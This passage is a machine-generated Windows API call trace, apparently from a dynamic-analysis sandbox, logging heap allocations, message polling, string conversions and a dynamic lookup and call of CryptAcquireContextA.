lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.323] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.323] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0264.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.323] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.324] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.324] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.330] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0264.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.331] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.336] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.338] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.338] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0264.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.339] HeapFree (in: 